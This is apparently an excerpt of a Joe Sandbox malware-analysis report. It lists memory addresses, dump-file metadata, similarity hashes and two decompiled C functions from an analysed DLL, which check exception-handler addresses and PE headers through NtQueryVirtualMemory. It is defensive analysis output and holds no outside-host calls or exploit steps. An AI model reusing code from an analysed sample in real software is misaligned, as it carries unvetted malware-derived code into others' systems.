                                                  0x00ec99de
                                                  0x00ec99e1
                                                  0x00ec99fc
                                                  0x00ec99ff
                                                  0x00ec9a18
                                                  0x00ec9a1b
                                                  0x00ec9a2b
                                                  0x00ec9a2e
                                                  0x00ec9a46
                                                  0x00ec9a49
                                                  0x00ec9a63
                                                  0x00ec9a66
                                                  0x00ec9a7e
                                                  0x00ec9a81
                                                  0x00ec9a97
                                                  0x00ec9a9a
                                                  0x00ec9ab2
                                                  0x00ec9ab5
                                                  0x00ec9acd
                                                  0x00ec9ad0
                                                  0x00ec9aea
                                                  0x00ec9aed
                                                  0x00ec9b03
                                                  0x00ec9b06
                                                  0x00ec9b1e
                                                  0x00ec9b21
                                                  0x00ec9b3b
                                                  0x00ec9b3e
                                                  0x00ec9b56
                                                  0x00ec9b59
                                                  0x00ec9b6f
                                                  0x00ec9b72
                                                  0x00ec9b8a
                                                  0x00ec9b8d
                                                  0x00ec9ba5
                                                  0x00ec9ba8
                                                  0x00ec9bba
                                                  0x00ec9bbd
                                                  0x00ec9bcf
                                                  0x00ec9bd2
                                                  0x00ec9be4
                                                  0x00ec9be7
                                                  0x00ec9beb
                                                  0x00ec9bfb
                                                  0x00ec9bfe
                                                  0x00ec9c0c
                                                  0x00ec9c0f
                                                  0x00ec9c21
                                                  0x00ec9c24
                                                  0x00ec9c38
                                                  0x00ec9c3b
                                                  0x00ec9c3d
                                                  0x00ec9c4d
                                                  0x00ec9c50
                                                  0x00ec9c62
                                                  0x00ec9c65
                                                  0x00ec9c73
                                                  0x00ec9c76
                                                  0x00ec9c88
                                                  0x00ec9c8b
                                                  0x00ec9c8f
                                                  0x00ec9c9f
                                                  0x00ec9ca2
                                                  0x00ec9cb4
                                                  0x00ec9cb7
                                                  0x00ec9cc5
                                                  0x00ec9cc8
                                                  0x00ec9cda
                                                  0x00ec9cdd
                                                  0x00ec9cef
                                                  0x00ec9cf2
                                                  0x00ec9d06
                                                  0x00ec9d09
                                                  0x00ec9d1d
                                                  0x00ec9d20
                                                  0x00ec9d34
                                                  0x00ec9d37
                                                  0x00ec9d4b
                                                  0x00ec9d4e
                                                  0x00ec9d62
                                                  0x00ec9d65
                                                  0x00ec9d79
                                                  0x00ec9d7e
                                                  0x00ec9d90
                                                  0x00ec9d93
                                                  0x00ec9da7
                                                  0x00ec9daa
                                                  0x00ec9dbe
                                                  0x00ec9dc1
                                                  0x00ec9dd7
                                                  0x00ec9dda
                                                  0x00ec9dee
                                                  0x00ec9df1
                                                  0x00ec9e03
                                                  0x00ec9e06
                                                  0x00ec9e1a
                                                  0x00ec9e1d
                                                  0x00ec9e31
                                                  0x00ec9e34
                                                  0x00ec9e48
                                                  0x00ec9e51
                                                  0x00ec9e54
                                                  0x00ec9e5d
                                                  0x00ec9e66
                                                  0x00ec9e6e
                                                  0x00ec9e76
                                                  0x00ec9e80
                                                  0x00ec9e95

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID:
                                                  • API String ID: 2221118986-0
                                                  • Opcode ID: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
                                                  • Instruction ID: 0ec3f77b783fb3f649de73bef97cb6ff7efa7b26aeeedc2eaf939251833ef866
                                                  • Opcode Fuzzy Hash: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
                                                  • Instruction Fuzzy Hash: 6322847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ECB341, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00ECB341(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xecd2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xecd328 = 1;
										__eflags =  *0xecd328;
										if( *0xecd328 != 0) {
											goto L60;
										}
										_t84 =  *0xecd2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xecd328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xecd2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xecd2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xecd2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xecd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xecd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xecd328 = 1;
							__eflags =  *0xecd328;
							if( *0xecd328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xecd2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xecd2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xecd328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xecd2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xecd2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xecd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xecd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                  0x00ecb34b
                                                  0x00ecb34e
                                                  0x00ecb354
                                                  0x00ecb372
                                                  0x00000000
                                                  0x00ecb372
                                                  0x00ecb35c
                                                  0x00ecb365
                                                  0x00ecb36b
                                                  0x00ecb37a
                                                  0x00ecb37d
                                                  0x00ecb380
                                                  0x00ecb38a
                                                  0x00ecb38a
                                                  0x00ecb38c
                                                  0x00ecb38f
                                                  0x00ecb391
                                                  0x00ecb391
                                                  0x00ecb393
                                                  0x00ecb396
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb398
                                                  0x00ecb39a
                                                  0x00ecb400
                                                  0x00ecb400
                                                  0x00ecb55e
                                                  0x00000000
                                                  0x00ecb55e
                                                  0x00ecb39c
                                                  0x00ecb39c
                                                  0x00ecb3a0
                                                  0x00ecb3a2
                                                  0x00ecb3a2
                                                  0x00ecb3a2
                                                  0x00ecb3a2
                                                  0x00ecb3a5
                                                  0x00ecb3a6
                                                  0x00ecb3a9
                                                  0x00ecb3a9
                                                  0x00ecb3ad
                                                  0x00ecb3b1
                                                  0x00ecb3bf
                                                  0x00ecb3bf
                                                  0x00ecb3c7
                                                  0x00ecb3cd
                                                  0x00ecb3cf
                                                  0x00ecb3d1
                                                  0x00ecb3e1
                                                  0x00ecb3ee
                                                  0x00ecb3f2
                                                  0x00ecb3f7
                                                  0x00ecb3f9
                                                  0x00ecb477
                                                  0x00ecb477
                                                  0x00ecb3fb
                                                  0x00ecb3fb
                                                  0x00ecb3fb
                                                  0x00ecb479
                                                  0x00ecb47b
                                                  0x00ecb55c
                                                  0x00ecb55c
                                                  0x00000000
                                                  0x00ecb481
                                                  0x00ecb481
                                                  0x00ecb488
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb48e
                                                  0x00ecb492
                                                  0x00ecb4ee
                                                  0x00ecb4f0
                                                  0x00ecb4f8
                                                  0x00ecb4fa
                                                  0x00ecb4fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4fe
                                                  0x00ecb504
                                                  0x00ecb506
                                                  0x00ecb508
                                                  0x00ecb51d
                                                  0x00ecb51d
                                                  0x00ecb51f
                                                  0x00ecb54e
                                                  0x00ecb555
                                                  0x00000000
                                                  0x00ecb555
                                                  0x00ecb523
                                                  0x00ecb524
                                                  0x00ecb526
                                                  0x00ecb528
                                                  0x00ecb528
                                                  0x00ecb52a
                                                  0x00ecb52c
                                                  0x00ecb52e
                                                  0x00ecb542
                                                  0x00ecb542
                                                  0x00ecb545
                                                  0x00ecb547
                                                  0x00ecb547
                                                  0x00ecb548
                                                  0x00ecb548
                                                  0x00000000
                                                  0x00ecb530
                                                  0x00ecb530
                                                  0x00ecb530
                                                  0x00ecb539
                                                  0x00ecb53a
                                                  0x00ecb53c
                                                  0x00ecb53e
                                                  0x00ecb53e
                                                  0x00000000
                                                  0x00ecb530
                                                  0x00ecb52e
                                                  0x00ecb50a
                                                  0x00ecb511
                                                  0x00ecb511
                                                  0x00ecb513
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb515
                                                  0x00ecb516
                                                  0x00ecb519
                                                  0x00ecb51b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb51b
                                                  0x00000000
                                                  0x00ecb511
                                                  0x00ecb494
                                                  0x00ecb497
                                                  0x00ecb49c
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4a5
                                                  0x00ecb4a7
                                                  0x00ecb4ad
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4b3
                                                  0x00ecb4b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4bf
                                                  0x00ecb4c1
                                                  0x00ecb4ca
                                                  0x00ecb4ce
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4d4
                                                  0x00ecb4d7
                                                  0x00ecb4d9
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4e0
                                                  0x00ecb4e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4e4
                                                  0x00ecb4e8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4e8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3d3
                                                  0x00ecb3d3
                                                  0x00ecb3d3
                                                  0x00ecb3da
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3dc
                                                  0x00ecb3dd
                                                  0x00ecb3df
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3df
                                                  0x00ecb407
                                                  0x00ecb409
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb419
                                                  0x00ecb41b
                                                  0x00ecb41d
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb423
                                                  0x00ecb42a
                                                  0x00ecb456
                                                  0x00ecb456
                                                  0x00ecb458
                                                  0x00ecb45a
                                                  0x00ecb46e
                                                  0x00ecb470
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb45c
                                                  0x00ecb45c
                                                  0x00ecb45c
                                                  0x00ecb465
                                                  0x00ecb466
                                                  0x00ecb468
                                                  0x00ecb46a
                                                  0x00ecb46a
                                                  0x00000000
                                                  0x00ecb45c
                                                  0x00ecb42c
                                                  0x00ecb42c
                                                  0x00ecb42f
                                                  0x00ecb431
                                                  0x00ecb443
                                                  0x00ecb443
                                                  0x00ecb446
                                                  0x00ecb448
                                                  0x00ecb448
                                                  0x00ecb449
                                                  0x00ecb449
                                                  0x00ecb44f
                                                  0x00ecb44f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb433
                                                  0x00ecb433
                                                  0x00ecb433
                                                  0x00ecb43a
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb43c
                                                  0x00ecb43c
                                                  0x00ecb43d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb43d
                                                  0x00ecb43f
                                                  0x00ecb441
                                                  0x00ecb454
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb454
                                                  0x00000000
                                                  0x00ecb441
                                                  0x00ecb3b3
                                                  0x00ecb3b6
                                                  0x00ecb3b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3bb
                                                  0x00ecb3bd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3bd
                                                  0x00ecb382
                                                  0x00ecb384
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00ECB3F2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: MemoryQueryVirtual
                                                  • String ID:
                                                  • API String ID: 2850889275-0
                                                  • Opcode ID: a28c9dff143175d195219fb7fbdf4fd4d58ed9989d327eaaabd09be6efb45d99
                                                  • Instruction ID: 5b7ed0b030aef556b1ec7dfc41843085c69d44e50f34f9db6040964e1beb611b
                                                  • Opcode Fuzzy Hash: a28c9dff143175d195219fb7fbdf4fd4d58ed9989d327eaaabd09be6efb45d99
                                                  • Instruction Fuzzy Hash: 0261C3306046459FCB2D8E2DCA82F6A73A6FB80319F24A13DD855E7292E373DC478A44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402375, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402375(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x404178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4041c0 = 1;
										__eflags =  *0x4041c0;
										if( *0x4041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x404178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x404178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x404180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x40417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4041c0 = 1;
							__eflags =  *0x4041c0;
							if( *0x4041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x404180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x404178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                  0x0040237f
                                                  0x00402382
                                                  0x00402388
                                                  0x004023a6
                                                  0x00000000
                                                  0x004023a6
                                                  0x00402390
                                                  0x00402399
                                                  0x0040239f
                                                  0x004023ae
                                                  0x004023b1
                                                  0x004023b4
                                                  0x004023be
                                                  0x004023be
                                                  0x004023c0
                                                  0x004023c3
                                                  0x004023c5
                                                  0x004023c5
                                                  0x004023c7
                                                  0x004023ca
                                                  0x00000000
                                                  0x00000000
                                                  0x004023cc
                                                  0x004023ce
                                                  0x00402434
                                                  0x00402434
                                                  0x00402592
                                                  0x00000000
                                                  0x00402592
                                                  0x004023d0
                                                  0x004023d0
                                                  0x004023d4
                                                  0x004023d6
                                                  0x004023d6
                                                  0x004023d6
                                                  0x004023d6
                                                  0x004023d9
                                                  0x004023da
                                                  0x004023dd
                                                  0x004023dd
                                                  0x004023e1
                                                  0x004023e5
                                                  0x004023f3
                                                  0x004023f3
                                                  0x004023fb
                                                  0x00402401
                                                  0x00402403
                                                  0x00402405
                                                  0x00402415
                                                  0x00402422
                                                  0x00402426
                                                  0x0040242b
                                                  0x0040242d
                                                  0x004024ab
                                                  0x004024ab
                                                  0x0040242f
                                                  0x0040242f
                                                  0x0040242f
                                                  0x004024ad
                                                  0x004024af
                                                  0x00402590
                                                  0x00402590
                                                  0x00000000
                                                  0x004024b5
                                                  0x004024b5
                                                  0x004024bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004024c2
                                                  0x004024c6
                                                  0x00402522
                                                  0x00402524
                                                  0x0040252c
                                                  0x0040252e
                                                  0x00402530
                                                  0x00000000
                                                  0x00000000
                                                  0x00402532
                                                  0x00402538
                                                  0x0040253a
                                                  0x0040253c
                                                  0x00402551
                                                  0x00402551
                                                  0x00402553
                                                  0x00402582
                                                  0x00402589
                                                  0x00000000
                                                  0x00402589
                                                  0x00402557
                                                  0x00402558
                                                  0x0040255a
                                                  0x0040255c
                                                  0x0040255c
                                                  0x0040255e
                                                  0x00402560
                                                  0x00402562
                                                  0x00402576
                                                  0x00402576
                                                  0x00402579
                                                  0x0040257b
                                                  0x0040257b
                                                  0x0040257c
                                                  0x0040257c
                                                  0x00000000
                                                  0x00402564
                                                  0x00402564
                                                  0x00402564
                                                  0x0040256d
                                                  0x0040256e
                                                  0x00402570
                                                  0x00402572
                                                  0x00402572
                                                  0x00000000
                                                  0x00402564
                                                  0x00402562
                                                  0x0040253e
                                                  0x00402545
                                                  0x00402545
                                                  0x00402547
                                                  0x00000000
                                                  0x00000000
                                                  0x00402549
                                                  0x0040254a
                                                  0x0040254d
                                                  0x0040254f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040254f
                                                  0x00000000
                                                  0x00402545
                                                  0x004024c8
                                                  0x004024cb
                                                  0x004024d0
                                                  0x00000000
                                                  0x00000000
                                                  0x004024d9
                                                  0x004024db
                                                  0x004024e1
                                                  0x00000000
                                                  0x00000000
                                                  0x004024e7
                                                  0x004024ed
                                                  0x00000000
                                                  0x00000000
                                                  0x004024f3
                                                  0x004024f5
                                                  0x004024fe
                                                  0x00402502
                                                  0x00000000
                                                  0x00000000
                                                  0x00402508
                                                  0x0040250b
                                                  0x0040250d
                                                  0x00000000
                                                  0x00000000
                                                  0x00402514
                                                  0x00402516
                                                  0x00000000
                                                  0x00000000
                                                  0x00402518
                                                  0x0040251c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040251c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402407
                                                  0x00402407
